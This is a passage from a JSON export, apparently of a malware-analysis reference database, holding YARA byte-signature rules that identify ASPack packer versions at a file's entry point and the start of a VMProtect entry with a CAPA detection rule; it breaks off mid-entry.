09 5D 55 81 ED 39 39 44 00 C3 E9 59 04 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v105b_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED CE 3A 44 ?? B8 C8 3A 44 ?? 
03 C5 2B 85 B5 3E 44 ?? 89 85 C1 3E 44 ?? 80 BD AC 3E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_032a_fake_ASPack_212_emadicius_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v102b_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 96 78 43 00 B8 90 78 43 00 03 C5 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_108_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 75 01 FF E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v1061b_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED EA A8 43 ?? B8 E4 A8 43 ?? 03 C5 2B 85 78 AD 43 ?? 89 85 84 AD 43 ?? 80 BD 6E AD 43 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v102a_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED 06 ?? ?? ?? 64 A0 23 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_2xwithouth_Poly_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? 
60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB EC FF FF FF 03 DD 81 EB 00 40 1C 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_1061b_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED EA A8 43 00 B8 E4 A8 43 00 03 C5 2B 85 78 AD 43 00 89 85 84 AD 43 00 80 BD 6E AD 43 00 00 75 15 FE 85 6E AD 43 00 E8 1D 00 00 00 E8 73 02 00 00 E8 0A 03 00 00 8B 85 70 AD 43 00 03 85 84 AD 43 00 89 44 24 1C 61 FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10804: PEiD\r\n{\r\n    strings:\r\n        $a = { A8 03 61 75 08 B8 01 C2 0C 68 C3 8B 85 26 04 8D 8D 3B 04 51 50 FF }\r\n        $b = { 60 E8 41 06 00 00 EB 41 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v100b_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED 92 1A 44 ?? B8 8C 1A 44 ?? 03 C5 2B 85 CD 1D 44 ?? 89 85 D9 1D 44 ?? 80 BD C4 1D 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10804_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_10801_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 75 ?? 
90 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_101b: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED D2 2A 44 00 B8 CC 2A 44 00 03 C5 2B 85 A5 2E 44 00 89 85 B1 2E 44 00 80 BD 9C 2E 44 00 00 75 15 FE 85 9C 2E 44 00 E8 1D 00 00 00 E8 E4 01 00 00 E8 7A 02 00 00 8B 85 9D 2E 44 00 03 85 B1 2E 44 00 89 44 24 1C 61 FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10804_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 41 06 00 00 EB 41 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_103b_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED AE 98 43 00 B8 A8 98 43 00 03 C5 2B 85 18 9D 43 00 89 85 24 9D 43 00 80 BD 0E 9D 43 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v103b_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED AE 98 43 ?? B8 A8 98 43 ?? 03 C5 2B 85 18 9D 43 ?? 89 85 24 9D 43 ?? 80 BD 0E 9D 43 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_v032a_fake_ASPack_212_emadicius_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 73 00 00 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v101b_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED D2 2A 44 ?? B8 CC 2A 44 ?? 03 C5 2B 85 A5 2E 44 ?? 89 85 B1 2E 44 ?? 
80 BD 9C 2E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10802_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 ED 23 6A 44 00 BB 10 ?? 44 00 03 DD 2B 9D 72 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_105b: PEiD\r\n{\r\n    strings:\r\n        $a = { 75 00 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_01_ASPack_2xx_Heuristic: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 A8 03 00 00 61 75 08 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 C3 8B 85 26 04 00 00 8D 8D 3B 04 00 00 51 50 FF 95 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_v032a_fake_ASPack_212_emadicius: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 A0 02 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }\r\n        $b = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 73 00 00 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_1061b_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED EA A8 43 00 B8 E4 A8 43 00 03 C5 2B 85 78 AD 43 00 89 85 84 
AD 43 00 80 BD 6E AD 43 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v21_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 72 05 00 00 EB 33 87 DB 90 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v2000_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 48 11 00 00 C3 83 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_106b_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 75 00 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10804_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v2000: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 72 05 ?? ?? EB }\r\n        $b = { 60 E8 70 05 00 00 EB 4C }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v2001: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 72 05 ?? ?? EB 33 87 DB }\r\n        $b = { 60 E8 72 05 00 00 EB 4C }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule MSLRH_032a_fake_ASPack_211d_emadicius: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v103b_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? E8 0D ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 
58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v211d_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 00 00 00 EB 09 5D 55 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v108x: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D BB 03 }\r\n        $b = { 60 EB 03 5D FF E5 E8 F8 FF FF FF 81 ED 1B 6A 44 00 BB 10 6A 44 00 03 DD 2B 9D 2A }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v1061b: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 5D 81 ED B8 03 C5 2B 85 0B DE 89 85 17 DE 80 BD 01 }\r\n        $b = { 60 E8 ?? ?? ?? ?? 5D 81 ED EA A8 43 ?? B8 E4 A8 43 ?? 03 C5 2B 85 78 AD 43 ?? 89 85 84 AD 43 ?? 80 BD 6E AD 43 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v10801: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 44 BB 10 44 03 DD 2B }\r\n        $b = { 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 ?? ?? ?? 44 00 BB 10 ?? 44 00 03 DD 2B 9D }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v10802: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 EB 03 5D FF E5 E8 F8 FF FF FF 81 ED 1B 6A 44 ?? BB 10 6A 44 ?? 03 DD 2B 9D }\r\n        $b = { 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 ED 23 6A 44 00 BB 10 ?? 44 00 03 DD 2B 9D 72 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v10803: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED 0A 4A 44 ?? BB 04 4A 44 ?? 
03 }\r\n        $b = { 60 E8 00 00 00 00 5D 81 ED 0A 4A 44 00 BB 04 4A 44 00 03 DD }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_107b_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 3E D9 43 00 B8 38 D9 43 00 03 C5 2B 85 0B DE 43 00 89 85 17 DE 43 00 80 BD 01 DE 43 00 00 75 15 FE 85 01 DE 43 00 E8 1D 00 00 00 E8 79 02 00 00 E8 12 03 00 00 8B 85 03 DE 43 00 03 85 17 DE 43 00 89 44 24 1C 61 FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v107b_DLL_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D ?? ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_ASPack_2xx_Heuristic: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 A8 03 00 00 61 75 08 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 C3 8B 85 26 04 00 00 8D 8D 3B 04 00 00 51 50 FF 95 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v211_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 F9 11 00 00 C3 83 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10802_Hint_WIN_EP_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 75 01 90 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_212withouth_Poly_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? 
E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10803_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 0A 4A 44 00 BB 04 4A 44 00 03 DD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v212_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v104b: PEiD\r\n{\r\n    strings:\r\n        $a = { 75 ?? }\r\n        $b = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 2B 85 ?? 12 9D ?? 89 85 1E 9D ?? ?? 80 BD 08 9D }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v105b: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 75 ?? }\r\n        $b = { 60 E8 ?? ?? ?? ?? 5D 81 ED CE 3A 44 ?? B8 C8 3A 44 ?? 03 C5 2B 85 B5 3E 44 ?? 89 85 C1 3E 44 ?? 80 BD AC 3E 44 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule MSLRH_032a_fake_ASPack_211d_emadicius_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 3A 4D 3A 1E EB 02 CD 20 9C EB 02 CD 20 EB 02 CD 20 60 EB 02 C7 05 EB 02 CD 20 E8 03 00 00 00 E9 EB 04 58 40 50 C3 61 9D 1F EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v108: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 75 01 FF }\r\n        $b = { 90 75 01 FF E9 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule MSLRH_v032a_fake_ASPack_212_emadicius_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 A0 02 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 
EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v102b_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 8A 1C 40 00 B9 9E 00 00 00 8D BD 4C 23 40 00 8B F7 33 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v106b: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 75 ?? }\r\n        $b = { 90 90 90 75 00 E9 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v104b_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 2B 85 ?? 12 9D ?? 89 85 1E 9D ?? ?? 80 BD 08 9D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_V22_Alexey_Solodovnikov_StarForce_2009408: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD ?? ?? ?? ?? ?? ?? 83 BD 7D 04 00 00 00 89 9D 7D 04 00 00 0F 85 C0 03 00 00 8D 85 89 04 00 00 50 FF 95 09 0F 00 00 89 85 81 04 00 00 8B F0 8D 7D 51 57 56 FF 95 05 0F 00 00 AB B0 00 AE 75 FD 38 07 75 EE 8D 45 7A FF E0 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 56 69 72 74 75 61 6C 46 72 65 65 00 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 8B 9D 8D 05 00 00 0B DB 74 0A 8B 03 87 85 91 05 00 00 89 03 8D B5 BD 05 00 00 83 3E 00 0F 84 15 01 00 00 6A 04 68 00 10 00 00 68 00 18 00 00 6A 00 FF 55 51 89 85 53 01 00 00 8B 46 04 05 0E 01 00 00 6A 04 68 00 10 00 00 50 6A 00 FF 55 51 89 85 4F 01 00 00 56 8B 1E 03 9D 7D 04 00 00 FF B5 53 01 00 00 FF 76 04 50 53 E8 2D 05 00 00 B3 00 80 FB 00 75 5E FE 85 E9 00 00 00 8B 3E 03 BD 7D 04 00 00 FF 37 C6 07 C3 FF D7 8F 07 50 51 56 53 8B C8 83 E9 06 8B B5 4F 01 00 00 33 DB 0B C9 74 2E 78 2C AC 3C E8 74 0A EB 00 3C E9 74 04 43 49 EB EB 8B 06 EB 00 ?? ?? ?? 
75 F3 24 00 C1 C0 18 2B C3 89 06 83 C3 05 83 C6 04 83 E9 05 EB CE 5B 5E 59 58 EB 08 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v107b_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 2B 85 ?? 0B DE ?? 89 85 17 DE ?? ?? 80 BD 01 DE }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v108x_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 EB 03 5D FF E5 E8 F8 FF FF FF 81 ED 1B 6A 44 00 BB 10 6A 44 00 03 DD 2B 9D 2A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10801_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 ?? ?? ?? 44 00 BB 10 ?? 44 00 03 DD 2B 9D }\r\n        $b = { 60 EB ?? 5D EB ?? FF ?? ?? ?? ?? ?? E9 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v100b: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 5D 81 ED D2 2A 44 B8 CC 2A 44 03 C5 2B 85 A5 2E 44 89 85 B1 2E 44 80 BD 9C 2E }\r\n        $b = { 60 E8 ?? ?? ?? ?? 5D 81 ED 92 1A 44 ?? B8 8C 1A 44 ?? 03 C5 2B 85 CD 1D 44 ?? 89 85 D9 1D 44 ?? 80 BD C4 1D 44 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_102b_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 96 78 43 00 B8 90 78 43 00 03 C5 2B 85 7D 7C 43 00 89 85 89 7C 43 00 80 BD 74 7C 43 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v102a: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 5D 81 ED 96 78 43 B8 90 78 43 03 C5 2B 85 7D 7C 43 89 85 89 7C 43 80 BD 74 7C }\r\n        $b = { 60 E8 ?? ?? ?? ?? 5D 81 ED 3E D9 43 ?? B8 38 ?? ?? ?? 03 C5 2B 85 0B DE 43 ?? 89 85 17 DE 43 ?? 80 BD 01 DE 43 ?? ?? 75 15 FE 85 01 DE 43 ?? E8 1D ?? ?? ?? E8 79 02 ?? ?? E8 12 03 ?? ?? 8B 85 03 DE 43 ?? 03 85 17 DE 43 ?? 
89 44 24 1C 61 FF }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v102b: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED 96 78 43 ?? B8 90 78 43 ?? 03 }\r\n        $b = { 60 E8 00 00 00 00 5D 81 ED 96 78 43 00 B8 90 78 43 00 03 C5 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v108x_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E9 ?? ?? ?? ?? EF 40 03 A7 07 8F 07 1C 37 5D 43 A7 04 B9 2C 3A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v211b_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 E9 3D 04 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v105b_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED CE 3A 44 ?? B8 C8 3A 44 ?? 03 C5 2B 85 B5 3E 44 ?? 89 85 C1 3E 44 ?? 80 BD AC 3E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_211_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E9 3D 04 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_212b_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB EC FF FF FF 03 DD 81 EB 00 ?? ?? 00 83 BD 22 04 00 00 00 89 9D 22 04 00 00 0F 85 65 03 00 00 8D 85 2E 04 00 00 50 FF 95 4C 0F 00 00 89 85 26 04 00 00 8B F8 8D 5D 5E 53 50 FF 95 48 0F 00 00 89 85 4C 05 00 00 8D 5D 6B 53 57 FF 95 48 0F }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v1061b_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED EA A8 43 ?? B8 E4 A8 43 ?? 03 C5 2B 85 78 AD 43 ?? 89 85 84 AD 43 ?? 
80 BD 6E AD 43 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v107b_DLL_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D ?? ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
                }
            ]
        },
        {
            "id": 191,
            "unprotect_id": "U1410",
            "name": "VMProtect",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "VMProtect protects code by executing it on a virtual machine with non-standard architecture that makes it extremely difficult to analyze and crack the software. Besides that, VMProtect generates and verifies serial numbers, limits free upgrades and much more.",
            "resources": "https://vmpsoft.com/",
            "tags": "vmprotect",
            "snippets": [],
            "detection_rules": [
                {
                    "id": 100,
                    "key": "capa_detect_vmprotect",
                    "type": {
                        "id": 2,
                        "name": "CAPA",
                        "syntax_lang": "yaml"
                    },
                    "name": "CAPA_Detect_vmprotect",
                    "rule": "rule:\r\n  meta:\r\n    name: packed with VMProtect\r\n    namespace: anti-analysis/packer/vmprotect\r\n    authors:\r\n      - william.ballenthin@mandiant.com\r\n    scope: file\r\n    att&ck:\r\n      - Defense Evasion::Obfuscated Files or Information::Software Packing [T1027.002]\r\n    mbc:\r\n      - Anti-Static Analysis::Software Packing::VMProtect [F0001.010]\r\n    references:\r\n      - https://www.pcworld.com/article/2824572/leaked-programming-manual-may-help-criminals-develop-more-atm-malware.html\r\n      - https://www.hexacorn.com/blog/2016/12/15/pe-section-names-re-visited/\r\n    examples:\r\n      - 971e599e6e707349eccea2fd4c8e5f67\r\n  features:\r\n    - or:\r\n      - string: \"A debugger has been found running in your system.\"\r\n      - string: \"Please, unload it from memory and restart your program.\"\r\n      - string: \"File corrupted!. This program has been manipulated and maybe\"\r\n      - string: \"it's infected by a Virus or cracked. This file won't work anymore.\"\r\n      - section: .vmp0\r\n      - section: .vmp1\r\n      - section: .vmp2"
                },
                {
                    "id": 108,
                    "key": "yara_detect_vmprotect",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "YARA_Detect_vmprotect",
